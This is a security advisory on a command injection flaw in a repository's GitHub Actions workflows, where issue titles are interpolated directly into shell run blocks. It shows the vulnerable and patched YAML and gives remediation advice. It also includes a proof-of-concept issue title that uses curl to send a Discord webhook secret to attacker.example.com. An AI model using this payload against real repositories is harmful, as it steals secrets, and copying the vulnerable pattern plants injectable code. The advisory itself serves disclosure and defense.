GHSA-f67f-hcr6-94mf: OS Command Injection in Zen-Ai-Pentest GitHub Actions Workflows

The vulnerability tracked as GHSA-f67f-hcr6-94mf affects the SHAdd0WTAka/Zen-Ai-Pentest repository. It manifests within multiple GitHub Actions workflows, specifically those handling Discord notifications, Telegram notifications, and Dependabot auto-merging. The flaw allows unauthenticated attackers to execute arbitrary shell commands on the GitHub Actions runner infrastructure.

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). It carries a CVSS v3.1 base score of 9.3. The defect originates from the improper handling of untrusted input derived from GitHub issue events. Because the system processes this input without adequate neutralization, attackers can inject shell metacharacters directly into workflow run commands.

The security impact extends beyond the immediate runner environment. Attackers can access repository secrets explicitly exposed to the vulnerable workflow jobs. These secrets include webhook URLs and bot tokens, which attackers can utilize to compromise the integrity of the project's external communication channels. Triggering the vulnerability requires no authentication or elevated repository permissions.

The root cause of this vulnerability lies in the direct interpolation of GitHub Actions context variables into shell scripts. The GitHub Actions engine evaluates expressions enclosed in ${{ ... }} during the workflow compilation phase. This text replacement occurs before the resulting shell script is passed to the runner for execution.

When an attacker provides input containing shell metacharacters, such as subshells denoted by $(...) or backticks, the engine embeds these characters directly into the generated script source. The bash interpreter on the runner then parses and evaluates the resulting string. Because the interpolation happens before shell execution, standard shell quoting mechanisms are bypassed entirely.

In the zenclaw-discord.yml workflow, developers attempted to sanitize the input using shell utilities like tr and cut. This mitigation attempt failed because the command injection occurs during the initial variable assignment. The bash interpreter evaluates the injected subshell to resolve the assignment before the sanitization pipeline receives the data.

An analysis of the vulnerable Prepare Notification step reveals the exact injection point. The workflow extracts the issue title using the github.event.issue.title context variable and places it directly inside double quotes within a run block.

# Vulnerable workflow pattern
run: |
  DESCRIPTION="${{ github.event.issue.title }}"

The patch implemented in commit 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca remediates the vulnerability by fundamentally altering how the context variable enters the shell environment. The developers moved the untrusted input mapping into an env block at the step level.

# Patched workflow pattern
env:
  ISSUE_TITLE: ${{ github.event.issue.title }}
run: |
  DESCRIPTION="$ISSUE_TITLE"

By assigning the context variable to an intermediate environment variable, the GitHub Actions engine sets the value in the runner's memory space before the bash process starts. The shell script then references the data using standard shell variable syntax ($ISSUE_TITLE). This configuration ensures the bash interpreter treats the input strictly as literal string data rather than executable code.

Exploitation requires the attacker to submit a maliciously crafted payload via a GitHub issue. The workflow is configured to trigger on the issues: opened event, meaning any GitHub user can initiate the execution flow. The attacker does not need write access to the repository to trigger the workflow runner.

The attacker crafts an issue title containing a bash subshell designed to exfiltrate environment variables. A documented proof-of-concept payload targets the DISCORD_WEBHOOK_URL secret. The payload executes the printenv command, encodes the output using base64, and appends it as a query parameter to an external URL via curl.

# Proof of Concept Payload (Issue Title)
bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")

When the workflow processes this title, the resulting bash assignment forces the immediate execution of the injected curl command. The runner executes the network request to the attacker-controlled server. This request successfully exfiltrates the encoded webhook URL before the workflow continues its normal execution.

The successful exploitation of this vulnerability yields a high impact on both confidentiality and integrity, as reflected by the CVSS 9.3 score. The primary confidentiality impact is the immediate disclosure of repository secrets explicitly mapped into the workflow environment. Identified exposed secrets include DISCORD_WEBHOOK_URL, TELEGRAM_BOT_TOKEN, and TELEGRAM_CHAT_ID.

The integrity impact is categorized as high because the compromised secrets grant the attacker control over the project's external integrations. An attacker possessing the Discord webhook or Telegram bot tokens can impersonate the repository bots. This access enables the distribution of false security alerts, malicious links, or misleading project updates to the community channels.

While the vulnerability provides arbitrary command execution on the GitHub runner, the scope of the compromise is constrained by the privileges assigned to the GITHUB_TOKEN and the specific secrets available to the job. The runner environment is ephemeral, meaning persistent access to the runner infrastructure itself is not achieved. However, the exfiltrated credentials retain their validity until manually revoked by repository administrators.

System administrators and developers must verify that the repository is updated to a commit subsequent to 07e65c72656a8213fc9ece2b3f4fc719032cfc5d. The official patch is implemented in commit 26c4e07df780f11b7e901ad2d88b3dc5ce8a1aca. Applying this update ensures all untrusted issue context variables are processed safely via environment variables.

In addition to patching the workflow configuration, repository maintainers must rotate all secrets that were exposed to the vulnerable workflows. This rotation process includes the Discord webhooks and Telegram bot tokens. Rotating these credentials is a mandatory step, as historical exploitation may have already compromised the existing keys.

The fix strategy applied in this repository aligns with GitHub's security hardening guidelines and is considered complete for the identified injection points. Development teams should audit all other GitHub Actions workflows within their organization to ensure that context variables like github.event.issue.title, github.event.pull_request.body, and github.head_ref are never directly interpolated into run blocks.